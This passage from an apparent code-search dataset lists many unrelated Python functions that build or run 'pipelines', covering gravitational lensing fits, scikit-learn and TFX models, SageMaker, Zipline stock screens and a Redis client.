),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n 
regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all 
defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def get_loading_pipeline(pipeline):\n loading_pipeline = []\n for transform in pipeline:\n is_loading = is_loading_function(transform)\n if is_loading is None: # MultiScaleFlipAug3D\n # extract its inner pipeline\n if isinstance(transform, dict):\n inner_pipeline = transform.get('transforms', [])\n else:\n inner_pipeline = transform.transforms.transforms\n loading_pipeline.extend(get_loading_pipeline(inner_pipeline))\n elif is_loading:\n loading_pipeline.append(transform)\n assert len(loading_pipeline) > 0, \\\n 'The data pipeline in your config file must include ' \\\n 'loading step.'\n return loading_pipeline", "def run(self, pipeline: pipeline_pb2.Pipeline) -> Optional[Any]:\n pass", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def _init_pipeline(self, cfg: ConfigType) -> Callable:", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Client\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Client(_ctx)", "def make_pipeline(steps):\n def compose2(f, g):\n return lambda x: g(f(x))\n return functools.reduce(compose2, steps)", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def delay_pipeline(pipeline, pipe):\n _pipeline = delayed(pipeline[0].curry())(pipe)\n for task in pipeline[1:]:\n _pipeline = delayed(task.curry())(_pipeline)\n\n return _pipeline", "def load_pipeline(name):\n pipeline = _load(name, get_pipelines_paths())\n if not pipeline:\n raise ValueError(\"Unknown pipeline: {}\".format(name))\n\n return pipeline", "def pipelines(self) -> list:\n if not self._pipelines:\n if \"pipelines\" not in self._pipeline_definition:\n raise ValueError(\"Pipeline is missing 'pipelines' field.\")\n elif len(self._pipeline_definition[\"pipelines\"]) == 0:\n raise ValueError(\"Pipeline has zero length 'pipelines' field.\")\n\n pipelines: list = list()\n for pipeline in self._pipeline_definition[\"pipelines\"]:\n pipelines.append(Pipeline(pipeline))\n\n self._pipelines = pipelines\n\n return self._pipelines", "def append(self, pipeline):\n for stage in pipeline.pipe:\n self._pipe.append(stage)\n return self", "def get_pipeline(self, y, n_quantiles=None):\n\n if n_quantiles is None:\n n_quantiles = _n_samples(y)\n\n self.pipe = _make_pipeline(estimator=self._regressor,\n transform=self.pipeline_transform,\n n_targets=_n_targets(y),\n random_state=self.random_state,\n verbose=self.verbose,\n n_jobs=self.n_jobs,\n cv=self.cv,\n memory=self.pipeline_memory,\n n_quantiles=n_quantiles,\n chain_order=self.chain_order,\n n_estimators=self.n_regressors,\n target_index=self.target_index,\n boosting_loss=self.boosting_loss,\n 
regularization=self.line_search_regularization,\n line_search_options=self.line_search_options)", "def create_pipeline(self, primitives, hyperparameters=None):\n\n self.primitive = self.check_path(primitives)\n\n if hyperparameters is not None:\n hyperparameters = self.check_path_hyperparameters(hyperparameters)\n pipeline = MLPipeline(self.primitive, hyperparameters)\n else:\n pipeline = MLPipeline(self.primitive)\n return pipeline", "def _pipeline(self):\n try:\n b = self._pipeline_cache\n except AttributeError:\n r = open_redis_connection()\n b = self._pipeline_cache = r.pipeline()\n return b", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def make_process_pipelines(\n self, dataset, return_epochs=False, return_raws=False, postprocess_pipeline=None\n ):\n if return_epochs and return_raws:\n message = \"Select only return_epochs or return_raws, not both\"\n raise ValueError(message)\n\n self.prepare_process(dataset)\n\n raw_pipelines = self._get_raw_pipelines()\n epochs_pipeline = self._get_epochs_pipeline(return_epochs, return_raws, dataset)\n array_pipeline = self._get_array_pipeline(\n return_epochs, return_raws, dataset, postprocess_pipeline\n )\n\n if array_pipeline is not None:\n events_pipeline = (\n self._get_events_pipeline(dataset) if return_raws else EpochsToEvents()\n )\n else:\n events_pipeline = None\n\n if events_pipeline is None and array_pipeline is not None:\n log.warning(\n f\"event_id not specified, using all the dataset's \"\n f\"events to generate labels: {dataset.event_id}\"\n )\n events_pipeline = (\n RawToEvents(dataset.event_id)\n if epochs_pipeline is None\n else EpochsToEvents()\n )\n\n process_pipelines = []\n for raw_pipeline in raw_pipelines:\n steps = []\n steps.append((StepType.RAW, SetRawAnnotations(dataset.event_id)))\n if raw_pipeline is not None:\n steps.append((StepType.RAW, raw_pipeline))\n if epochs_pipeline is not None:\n steps.append((StepType.EPOCHS, epochs_pipeline))\n if array_pipeline is not None:\n array_events_pipeline = ForkPipelines(\n [\n (\"X\", array_pipeline),\n (\"events\", events_pipeline),\n ]\n )\n steps.append((StepType.ARRAY, array_events_pipeline))\n process_pipelines.append(Pipeline(steps))\n return process_pipelines", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def _add_stage(self, name):\n def stage_func(self, *args, **kwargs):\n \"\"\" Stage function.\n\n :param args: Positional arguments.\n :param kwargs: Keyword arguments.\n :return: Pipeline (for method chaining).\n \"\"\"\n self._pipe.append(Stage(name, args, kwargs))\n return self\n\n setattr(Pipeline, name, stage_func)", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "async def get_pipeline(self, _id):\n return media.MediaPipeline(self, id=_id)", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, 
middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def get_pipeline_definition(self, pipeline_id) -> Any:\n if \"pipelines\" in self._pipeline_definition:\n for pipeline in self._pipeline_definition[\"pipelines\"]:\n if pipeline[\"id\"] == pipeline_id:\n return Pipeline(pipeline)\n\n return None", "def pipe(*args, **kwargs):\n return parser(*args, **kwargs)", "def run(cls, pipeline, monitor=True, verbose=False):\n\n pipe = cls(pipeline, monitor=monitor, verbose=verbose)\n pipe._main()", "def process(obj, rv, logfile, verbose):\n _end_branch(obj)\n\n logger.info('creating pipeline...')\n stdin = click.get_text_stream('stdin')\n stdout = click.get_text_stream('stdout')\n\n def write(item):\n stdout.write(str(item))\n stdout.write('\\n')\n\n pl = pipeline.create(obj['pipeline'], output=write)\n\n logger.info('processing...')\n logger.info('----------------------------------------')\n try:\n pl.run(stdin)\n except Exception as e:\n logger.error(f'abort: {type(e).__name__}: {e}')\n raise click.Abort from e\n logger.info('----------------------------------------')\n logger.info('DONE.')", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def run_pipeline(\n pipeline: Pipeline,\n start_date: str,\n end_date: str = None,\n bundle: str = None\n ) -> pd.DataFrame:\n return _run_pipeline(\n pipeline,\n start_date=start_date,\n end_date=end_date,\n bundle=bundle)", "def __init__(self, pipeline, config=None):\n self.config = config\n self.pipeline = pipeline", "def to_larva(self, pipeline=True) -> None:\n if \"-larva\" in 
sys.argv and pipeline:\n file_write(pipe_path(\"larva\"), self.build(), \"a\")\n else:\n print(self.build())", "def pipeline(self, transaction=True, shard_hint=None):\n p = Pipeline(\n connection_pool=self.connection_pool,\n response_callbacks=self.response_callbacks,\n transaction=transaction,\n shard_hint=shard_hint)\n return p", "def from_yaml(cls, path: str) -> \"Pipeline\":\n pipeline_configuration = PipelineConfiguration.from_yaml(path)\n\n return cls.from_config(pipeline_configuration)", "def build_logistic_regr():\n logistic_pipeline = None\n ##### Write code here #######\n logistic_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', LogisticRegression())\n ])\n ##### End of your work ######\n return logistic_pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. \n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def make_labels_pipeline(self, dataset, return_epochs=False, return_raws=False):\n if return_epochs:\n labels_pipeline = make_pipeline(\n EpochsToEvents(),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n elif return_raws:\n labels_pipeline = make_pipeline(\n self._get_events_pipeline(dataset),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n else: # return array\n labels_pipeline = EventsToLabels(event_id=self.used_events(dataset))\n return labels_pipeline", "def getPipeline(self, region: str, polygon: Polygon):\n boundaries, polygon_input = self.getPolygonBoundaries(polygon)\n\n full_dataset_path = f\"{self.public_data_url}{region}/ept.json\"\n\n self.pipeline_json['pipeline'][0]['filename'] = full_dataset_path\n self.pipeline_json['pipeline'][0]['bounds'] = boundaries\n self.pipeline_json['pipeline'][1]['polygon'] = polygon_input\n self.pipeline_json['pipeline'][3]['out_srs'] = f'EPSG:{self.output_epsg}'\n\n pipeline = pdal.Pipeline(json.dumps(self.pipeline_json))\n\n return pipeline", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', 
TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def get_delivery_pipeline(\n self,\n ) -> Callable[\n [cloud_deploy.GetDeliveryPipelineRequest], cloud_deploy.DeliveryPipeline\n ]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_delivery_pipeline\" not in self._stubs:\n self._stubs[\"get_delivery_pipeline\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/GetDeliveryPipeline\",\n request_serializer=cloud_deploy.GetDeliveryPipelineRequest.serialize,\n response_deserializer=cloud_deploy.DeliveryPipeline.deserialize,\n )\n return self._stubs[\"get_delivery_pipeline\"]", "def get_pipeline(\n region: str,\n role: str,\n pipeline_name: str,\n default_bucket: str,\n base_job_prefix: str,\n lambda_role_arn: str,\n data_uri: str,\n model_uri: str,\n transform_uri: str,\n baseline_uri: str = None,\n) -> Pipeline:\n sagemaker_session = get_session(region, default_bucket)\n\n # parameters for pipeline execution\n input_data_uri = ParameterString(\n name=\"DataInputUri\",\n default_value=data_uri,\n )\n input_model_uri = ParameterString(\n name=\"ModelInputUri\",\n default_value=model_uri,\n )\n output_transform_uri = ParameterString(\n name=\"TransformOutputUri\",\n default_value=transform_uri,\n )\n transform_instance_count = ParameterInteger(\n name=\"TransformInstanceCount\", default_value=1\n )\n transform_instance_type = ParameterString(\n name=\"TransformInstanceType\", default_value=\"ml.m5.xlarge\"\n )\n monitor_instance_count = ParameterInteger(\n name=\"MonitorInstanceCount\", default_value=1\n )\n monitor_instance_type = ParameterString(\n name=\"MonitorInstanceType\", default_value=\"ml.m5.xlarge\"\n )\n\n # Create cache configuration (Unable to pass parameter for expire_after value)\n cache_config = CacheConfig(enable_caching=True, expire_after=\"PT1H\")\n\n # Create the Model step\n image_uri_inference = sagemaker.image_uris.retrieve(\n framework=\"xgboost\",\n region=region,\n version=\"1.2-2\",\n py_version=\"py3\",\n instance_type=transform_instance_type,\n )\n\n model = Model(\n image_uri=image_uri_inference,\n model_data=input_model_uri,\n sagemaker_session=sagemaker_session,\n role=role,\n )\n\n inputs_model = CreateModelInput(instance_type=transform_instance_type)\n\n step_create_model = CreateModelStep(\n name=\"CreateModel\", model=model, inputs=inputs_model\n )\n\n # processing step for evaluation\n script_eval = ScriptProcessor(\n image_uri=image_uri_inference,\n command=[\"python3\"],\n instance_count=transform_instance_count,\n instance_type=transform_instance_type,\n base_job_name=f\"{base_job_prefix}/script-score\",\n sagemaker_session=sagemaker_session,\n role=role,\n )\n\n step_score = ProcessingStep(\n name=\"ScoreModel\",\n processor=script_eval,\n inputs=[\n ProcessingInput(\n source=input_model_uri,\n destination=\"/opt/ml/processing/model\",\n ),\n ProcessingInput(\n source=input_data_uri,\n destination=\"/opt/ml/processing/input\",\n ),\n ],\n outputs=[\n ProcessingOutput(output_name=\"scores\", source=\"/opt/ml/processing/output\"),\n ],\n code=os.path.join(BASE_DIR, \"score.py\"),\n cache_config=cache_config,\n )\n step_score.add_depends_on([step_create_model])\n\n steps = [step_create_model, step_score]\n\n if baseline_uri is not None:\n # Get the default model monitor container\n model_monitor_container_uri = sagemaker.image_uris.retrieve(\n 
framework=\"model-monitor\",\n region=region,\n version=\"latest\",\n )\n\n # Create the baseline job using\n dataset_format = DatasetFormat.csv()\n env = {\n \"dataset_format\": json.dumps(dataset_format),\n \"dataset_source\": \"/opt/ml/processing/input/baseline_dataset_input\",\n \"output_path\": \"/opt/ml/processing/output\",\n \"publish_cloudwatch_metrics\": \"Disabled\",\n \"baseline_constraints\": \"/opt/ml/processing/baseline/constraints/constraints.json\",\n \"baseline_statistics\": \"/opt/ml/processing/baseline/stats/statistics.json\",\n }\n\n monitor_analyzer = Processor(\n image_uri=model_monitor_container_uri,\n role=role,\n instance_count=monitor_instance_count,\n instance_type=monitor_instance_type,\n base_job_name=f\"{base_job_prefix}/monitoring\",\n sagemaker_session=sagemaker_session,\n max_runtime_in_seconds=1800,\n env=env,\n )\n\n step_monitor = ProcessingStep(\n name=\"ModelMonitor\",\n processor=monitor_analyzer,\n inputs=[\n ProcessingInput(\n source=step_score.properties.ProcessingOutputConfig.Outputs[\n \"scores\"\n ].S3Output.S3Uri,\n destination=\"/opt/ml/processing/input/baseline_dataset_input\",\n input_name=\"baseline_dataset_input\",\n ),\n ProcessingInput(\n source=os.path.join(baseline_uri, \"constraints.json\"),\n destination=\"/opt/ml/processing/baseline/constraints\",\n input_name=\"constraints\",\n ),\n ProcessingInput(\n source=os.path.join(baseline_uri, \"statistics.json\"),\n destination=\"/opt/ml/processing/baseline/stats\",\n input_name=\"baseline\",\n ),\n ],\n outputs=[\n ProcessingOutput(\n source=\"/opt/ml/processing/output\",\n output_name=\"monitoring_output\",\n ),\n ],\n cache_config=cache_config,\n )\n\n # Create an inline lambda step that inspects the output of the model monitoring\n step_lambda = LambdaStep(\n name=\"EvaluateDrift\",\n lambda_func=Lambda(\n function_name=f\"sagemaker-{pipeline_name}\", # Must be <64 characters\n execution_role_arn=lambda_role_arn,\n script=os.path.join(BASE_DIR, \"../lambda/lambda_evaluate_drift.py\"),\n handler=\"lambda_evaluate_drift.lambda_handler\",\n ),\n inputs={\n \"ProcessingJobName\": step_monitor.properties.ProcessingJobName,\n \"PipelineName\": pipeline_name,\n },\n outputs=[\n LambdaOutput(\n output_name=\"statusCode\", output_type=LambdaOutputTypeEnum.Integer\n )\n ],\n )\n\n steps += [step_monitor, step_lambda]\n\n # pipeline instance\n pipeline = Pipeline(\n name=pipeline_name,\n parameters=[\n input_data_uri,\n input_model_uri,\n output_transform_uri,\n transform_instance_count,\n transform_instance_type,\n monitor_instance_count,\n monitor_instance_type,\n ],\n steps=steps,\n sagemaker_session=sagemaker_session,\n )\n\n return pipeline", "def forward_transform(self):\n\n if self._pipeline:\n #return functools.reduce(lambda x, y: x | y, [step[1] for step in self._pipeline[: -1]])\n return functools.reduce(lambda x, y: x | y, [step.transform for step in self._pipeline[:-1]])\n else:\n return None", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def cli(ctx, pipeline, folder, branch):\n if len(pipeline.split('/')) != 3:\n raise BadArgumentUsage(\n \"Bad pipeline name. 
See 'popper add --help' for more info.\")\n\n owner, repo, pipe_name = pipeline.split('/')\n\n new_pipe_name, folder = pu.get_name_and_path_for_new_pipeline(\n folder, pipe_name)\n\n config = pu.read_config()\n\n if new_pipe_name in config['pipelines']:\n pu.fail(\"Pipeline {} already in repo.\".format(new_pipe_name))\n\n project_root = pu.get_project_root()\n\n pipelines_dir = os.path.join(project_root, folder)\n\n gh_url = 'https://github.com/{}/{}/'.format(owner, repo)\n gh_url += 'archive/{}.tar.gz'.format(branch)\n\n pu.info(\n \"Downloading pipeline {} as {}...\".format(pipe_name, new_pipe_name)\n )\n\n try:\n # Downloading and extracting the tarfile\n r = pu.make_gh_request(\n gh_url,\n msg=\"Unable to fetch the pipeline. Please check if the name\"\n \" of the pipeline is correct and the internet is connected\"\n )\n with tarfile.open(mode='r:gz', fileobj=BytesIO(r.content)) as t:\n t.extractall()\n\n if not os.path.exists(pipelines_dir):\n try:\n os.makedirs(pipelines_dir)\n except (OSError, IOError):\n pu.fail(\"Could not create the necessary path.\\n\")\n elif len(os.listdir(pipelines_dir)) != 0:\n pu.fail(\"The path already exists and is not empty.\")\n\n except ConnectionError:\n pu.fail(\"Could not download the pipeline due to Connection Error\")\n\n try:\n os.rename('{}-{}/pipelines/{}'.format(\n repo, branch, pipe_name), pipelines_dir)\n except OSError:\n pu.fail(\n \"Could not rename {} to {}.\".format(\n '{}-{}/pipelines/{}'.format(repo, branch, pipe_name),\n pipelines_dir\n )\n )\n finally:\n shutil.rmtree('{}-{}'.format(repo, branch))\n\n pu.info(\"Updating popper configuration... \")\n\n repo_config = get_config(owner, repo)\n\n config['pipelines'][new_pipe_name] = repo_config['pipelines'][pipe_name]\n config['pipelines'][new_pipe_name]['path'] = folder\n\n pu.write_config(config)\n pu.info(\n \"Pipeline {} has been added successfully.\".format(new_pipe_name),\n fg=\"green\"\n )", "def get_non_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_rf = SecondaryNode('rf', nodes_from=[node_scaling])\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_logit, node_rf])\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def create_pipeline(\n pipeline_name: Text,\n pipeline_root: Text,\n data_root: Text,\n module_file: Text,\n metadata_path: Text,\n beam_pipeline_args: List[Text],\n) -> tfx.dsl.Pipeline:\n example_gen = tfx.components.CsvExampleGen(input_base=data_root)\n\n # Computes statistics over data for visualization and example validation.\n statistics_gen = tfx.components.StatisticsGen(\n examples=example_gen.outputs['examples'])\n\n # Generates schema based on statistics files.\n schema_gen = tfx.components.SchemaGen(\n statistics=statistics_gen.outputs['statistics'],\n infer_feature_shape=True)\n\n # Performs anomaly detection based on statistics and data schema.\n example_validator = tfx.components.ExampleValidator(\n statistics=statistics_gen.outputs['statistics'],\n schema=schema_gen.outputs['schema'],\n )\n\n trainer_custom_config = {\n 'objective': 'reg:squarederror',\n 'learning_rate': 0.3,\n 'max_depth': 4,\n 'num_boost_round': 200,\n 'early_stopping_rounds': 40,\n }\n\n trainer = tfx.components.Trainer(\n module_file=module_file,\n examples=example_gen.outputs['examples'],\n schema=schema_gen.outputs['schema'],\n train_args=tfx.proto.TrainArgs(),\n eval_args=tfx.proto.EvalArgs(),\n custom_config=trainer_custom_config,\n )\n\n return tfx.dsl.Pipeline(\n 
pipeline_name=pipeline_name,\n pipeline_root=pipeline_root,\n components=[\n example_gen,\n statistics_gen,\n schema_gen,\n example_validator,\n trainer,\n ],\n enable_cache=True,\n metadata_connection_config=tfx.orchestration.metadata.\n sqlite_metadata_connection_config(metadata_path),\n beam_pipeline_args=beam_pipeline_args,\n )", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def make_lag(self,inputLabels,lagNum,suffix=None,fillMissing=np.nan,verbose=0,n_jobs=1):\n self._transform_wrapper(\n inputLabels,\n None,\n make_lag,\n suffix,\n lagNum,\n False,\n n_jobs,\n verbose,\n lagNum=lagNum,\n fillMissing=fillMissing\n )\n return self", "def get_default_pipeline(localizer_threshold=None, verbose=False):\n import pipeline\n import pipeline.pipeline\n import pipeline.objects\n \n outputs = [pipeline.objects.PipelineResult]\n if verbose:\n outputs += [pipeline.objects.CrownOverlay]\n conf = pipeline.pipeline.get_auto_config()\n if localizer_threshold is not None:\n conf['Localizer']['threshold_tag'] = localizer_threshold\n decoder_pipeline = pipeline.Pipeline([pipeline.objects.Image], # inputs\n outputs, # outputs\n **conf)\n return decoder_pipeline", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def pipe(self, func, *args, **kwargs):\n return func(self, *args, **kwargs)", "def pipeline(self, *funcs) -> \"fn\":\n return self._mod.pipeline(self, *funcs)", "def _getPipeline( self, plsPath ):\n plsH5 = h5py.File( plsPath, \"r\" )\n if \"PulseData\" not in 